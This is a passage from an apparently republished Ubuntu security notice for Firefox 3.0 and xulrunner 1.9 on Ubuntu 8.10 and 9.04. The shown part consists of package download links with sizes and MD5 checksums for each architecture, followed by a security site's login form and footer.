    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:   904910 169a31f85030f02eb8e44968ba510fc7
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:  4561668 ea3976fa943401876362a94a9d5ff1f3
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:    47110 bced433601d590bb2fafb315f4c6c83e
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:  8719222 3b3c880b06873b0ad872b7ef295af4bb
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:    22612 062c4688f6a3c597680abeab942aafba

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:   203694 8610142ff88bcb6deca2e0b413b96b6b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:   202044 fa931b6bb345d8a5aea565969b48cfe2
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:    68934 c669d0a6720b45c0f46b63fc556280fb
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:    84426 a42e413b39f3c3b9b4179a354d357c1c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:   887128 bdc93dca4ae94750111e67c679fab2bb
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:  4538026 bda5467de1fce192ed7a633c3ce6836f
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:    39374 07d59beb8b4d7dc16d577d0cb828eccd
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:  7547374 1dbbb849f126e00cb1c0729366576b7a
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_i386.deb
      Size/MD5:    22608 1f70c18618cd842f031e8fdc6a1da73c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:   203692 1ad67ed90ee6ffee2969eb1dcf5f1283
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:   202044 e7403f8b420e92e058003c8be769986d
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:    68934 146be288b73f922aee9988fa456e3055
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:    83828 65b70b987edea755b2589c93c4b053c2
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:   884292 6ed1f59afd34644043ea36c4a7c75e31
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:  4534876 6da72d63e5763f2dcf16ea62a2d318c9
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:    38412 b84311732b824b928f61f4a986c341db
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:  7444064 dd2b5e33d57f3b07880dbeaa59804d84
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_lpia.deb
      Size/MD5:    22606 c1ac5549962928d7e216aebeb7f6bebc

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:   203710 9395292fed83f4b89ba9cd4cb8d888be
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:   202054 dfc9b31ff48723948f38d032acb0309f
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:    68940 8b61d74f0a64c62a18a33f16d9bf12ae
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:    85808 792048ed0c9a7f5d1c91d2401abe51e2
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:   898616 8b19f61d862168a244780dbcc1c43e67
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:  4529016 91c5cc74d3f9d34642d6822cd52b0f59
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:    42410 ddf600af3ccaed2f2aa8c7030b93285d
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:  8285768 8bd67ed2d8806955039433df3c15a73a
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_powerpc.deb
      Size/MD5:    22616 bc87c104af0d5273712bab07ddb59096

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:   203698 b6fc36d21d06f410a61e68611a7c4f6a
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:   202056 3d717827e3f4702074133c2cd2ff9f4d
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:    68938 6c21fe08dbdc4a911652d4be0c7acde0
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:    83496 3436c4cff03486da7cbc9425cfee91c8
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:   886886 0d78b23fed422c84364c44bb83ea4cbd
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:  4515484 ed88c3b5e6eeccc8af8b78ebc22881ac
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:    37866 e8c216314c5135eacadec3cf70e247be
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:  8105454 938b568e4370bbd1a4e305a68fa8d2c6
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.8.10.1_sparc.deb
      Size/MD5:    22608 2af8da1acc922c2354a64cbf6c687c7a

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1.diff.gz
      Size/MD5:   124422 72d12552c60e36644bb1a1da3dd568ad
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1.dsc
      Size/MD5:     2787 b3253b4cd1c22b4464aa91faf49e7ba8
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly.orig.tar.gz
      Size/MD5: 11615299 f09c27cece35c86f4d79f8b7b8aff58d
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1.diff.gz
      Size/MD5:   252403 15b7ef468f05b9b0e232166b7eaaa5a1
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1.dsc
      Size/MD5:     2801 9e7ed5c309e5996ea9e12f932676cef6
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly.orig.tar.gz
      Size/MD5: 40380909 0990281629cdb7b9065760ef68eb1739

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69202 a72f7fe66881d6a14633d21180ce26e9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69108 7915de688b648b6132a1c1fbba081519
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69116 da22d76418e4e8a2ac26788c3db5b9d0
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69084 d9b2a0645c4397343e476082e2aa6445
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69070 20c3c26e4f1b3ece05a7cb225d19339e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69200 22a77fb77a26a467be4ad48ddb4a3296
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69128 271954acf7066e581fc72cf798976752
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69078 2a2bab2158613583628846ce55f5ee5c
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:     8970 5414726927402207ded13f979b773268
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:     8970 d18c9d55efab36889083b3dfa527fc7d
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69102 177c8993efa61d8b8e7eac6e3e220851
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69068 dc13fa03b60d7a9245322413dcb22a77
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69058 b3425848f2ea45648b8df9739cf4a75f
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:     8950 671ccbb0bb87b73db753c4df6b085e33
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69086 187624ec486c76a0ab4043a931534895
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:     8938 7c771339417f4bb1131cfd7448811c9a
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:    69050 4418335fe07bc4b004e59363988fb917
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:   128038 3d802c065e31b05e51305990a0d2ba9e
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.10+nobinonly-0ubuntu0.9.04.1_all.deb
      Size/MD5:   237806 f20faf0a90bd0d63f47ea7ed8b1e884e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:   203844 05d25e00881b0365ec9ad2edc66ec6d2
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:   202260 de0c8bb76a8ff91626c8effcf81a8f0d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:    69164 3e16227b08b1e3cf9bcdba153090c847
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:    88592 bdd1358c079cd61e9a2237d41a44c9b8
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:   904864 52fef8dd44cd293519ee970a2e67c839
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:  4561542 25522730b6232d80357ab661c2d7ee7f
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:    47114 40caef2948c801751a47099180b17cc5
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:  8720974 e2c0aca8f6547afdfec8f269bceef204
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_amd64.deb
      Size/MD5:    22960 7c8c9318f7dfc6aa468348021c65b275

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:   203842 27b352bd9ac7e5d67da0654de9506ebc
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:   202254 78c33b306f9e003c1cceb46fe9903817
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:    69164 0a107c043db89d75f15f0280de92ffdd
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:    84650 9413ba19234c9e9c3fbe1f10aa1a8d02
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:   887086 262d4789bc3d67267621a28eeac7bb44
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:  4537834 415e344572853b378c03bb109c435190
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:    39376 b5f058277085681ee7a19323cd722625
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:  7548408 e5d5b025aaeff3ae9af451e3cad712c6
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_i386.deb
      Size/MD5:    22960 7520200bcd4324221bfde498aeb5886d

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:   203846 e85ae1173313c44d3b13414859c88791
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:   202248 9aeca6c19b24524dc280350653e07e92
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:    69162 57cd8a0dc7d4bc52c8b228aaf3df4bd1
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:    84060 28b34f5fb38e484d4d4b0eb6051d2a3b
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:   884224 43f2ad26d850486c9ed86c64ae3b3c78
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:  4534730 968f7f166ab012005307ee844e91d916
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:    38388 3ea47ad1042c8cba7234d06b52bde897
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:  7445212 18fb38d4ce6f71ffc4bff3542a287b9e
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_lpia.deb
      Size/MD5:    22954 67f6c93537f8e87acba0cae92ab0802f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:   203848 a1a589168f24e2d906211995185855f8
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:   202246 5cb0e7ce2d11236627a0f0bb86e7c565
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:    69164 470c227571b28476e2402653a3fd1498
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:    86040 fbf11e6b6ec239d35bcbd1abaec0c98a
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:   898524 289b142d994117606b234035a527a95d
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:  4528780 8dc48186d9a415658e52a3fc0dfea3c8
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:    42424 c8e406148be00a89b0275eae33645486
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:  8286338 55f2ae4068db943549c240a61585a5c2
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_powerpc.deb
      Size/MD5:    22966 9c70101e88dfbbf49ca86752e9dce1e5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:   203850 b5bd172beb05c3b3d14622682a2d6f7f
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:   202252 884a929ab72bab9b5f3ae24dcb158e39
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:    69168 41ae051c0132ef5ff0ec65ac999ac75e
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:    83678 bdfc25221a812b82f3dfbefc7b84b63a
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:   886730 60f43f7a931ebcfc31aa86c3595c502e
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:  4515360 63a56ed232baedaf828966304dbb3382
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:    37818 56e010aab8b3d380a099e1e0fbd7fd6b
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:  8105660 1b85b2439dfc2774e6de7eeb950a41bd
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.10+nobinonly-0ubuntu0.9.04.1_sparc.deb
      Size/MD5:    22956 348acd577d9a50d1ea5e4ddb932d8e2b


New User Registration
Email:
UserID:
Passwd:
Please email me your monthly newsletters, informing the latest services, improvements & surveys.
Please email me a vulnerability test announcement whenever a new test is added.
   Privacy
Registered User Login
 
UserID:   
Passwd:  

 Forgot userid or passwd?
Email/Userid:




Home | About Us | Contact Us | Partner Programs | Privacy | Mailing Lists | Abuse
Security Audits | Managed DNS | Network Monitoring | Site Analyzer | Internet Research Reports
Web Probe | Whois

© 1998-2014 E-Soft Inc. All rights reserved.